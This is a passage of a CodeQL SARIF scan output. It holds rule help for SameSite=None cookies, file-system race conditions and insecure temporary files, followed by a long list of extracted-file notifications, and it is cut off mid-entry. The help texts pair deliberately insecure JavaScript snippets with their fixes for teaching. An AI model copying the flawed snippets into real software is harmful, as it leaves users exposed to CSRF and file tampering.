');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n", - "markdown" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1275" ], - "description" : "Sensitive cookies where the SameSite attribute is set to \"None\" can\n in some cases allow for Cross-Site Request Forgery (CSRF) attacks.", - "id" : "js/samesite-none-cookie", - "kind" : "problem", - "name" : "Sensitive cookie without SameSite restrictions", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/file-system-race", - "name" : "js/file-system-race", - "shortDescription" : { - "text" : "Potential file system race condition" - }, - "fullDescription" : { - "text" : "Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. 
These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. 
Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n", - "markdown" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to 
time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-367" ], - "description" : "Separately checking the state of a file before operating\n on it may allow an attacker to modify the file between\n the two operations.", - "id" : "js/file-system-race", - "kind" : "problem", - "name" : "Potential file system race condition", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.7" - } - }, { - "id" : "js/insecure-temporary-file", - "name" : "js/insecure-temporary-file", - "shortDescription" : { - "text" : "Insecure temporary file" - }, - "fullDescription" : { - "text" : "Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. 
These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n", - "markdown" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. 
These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n" - }, - "properties" : { - "tags" : [ "external/cwe/cwe-377", "external/cwe/cwe-378", "security" ], - "description" : "Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.", - "id" : "js/insecure-temporary-file", - "kind" : "path-problem", - "name" : "Insecure temporary file", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.0" - } - }, { - "id" : "js/summary/lines-of-code", - "name" : "js/summary/lines-of-code", - "shortDescription" : { - "text" : "Total lines of JavaScript and TypeScript code in the database" - }, - "fullDescription" : { - "text" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. 
This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "summary" ], - "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", - "id" : "js/summary/lines-of-code", - "kind" : "metric", - "name" : "Total lines of JavaScript and TypeScript code in the database" - } - }, { - "id" : "js/summary/lines-of-user-code", - "name" : "js/summary/lines-of-user-code", - "shortDescription" : { - "text" : "Total lines of user written JavaScript and TypeScript code in the database" - }, - "fullDescription" : { - "text" : "The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "summary", "lines-of-code" ], - "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", - "id" : "js/summary/lines-of-user-code", - "kind" : "metric", - "name" : "Total lines of user written JavaScript and TypeScript code in the database" - } - } ], - "locations" : [ { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", - "description" : { - "text" : "The QL pack root directory." 
- } - }, { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - } ] - }, - "invocations" : [ { - "toolExecutionNotifications" : [ { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/actions/install-codeql/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 5 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/actions/install-qlt/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 6 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/codeql-config.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 7 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 8 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 
- } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 9 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 10 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 11 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 12 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - 
"locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 13 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 14 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 15 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : ".github/workflows/code_scanning.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 16 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
".github/workflows/run-codeql-unit-tests-javascript.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 17 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "codeql-workspace.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 18 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 19 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 20 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 21 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 22 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 23 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 24 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 25 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - 
}, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 26 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 27 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 28 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 29 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - 
"descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 30 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 31 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 32 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 33 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 34 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 35 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 36 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - 
"formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 37 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 38 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 39 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 40 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 41 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 42 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 43 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 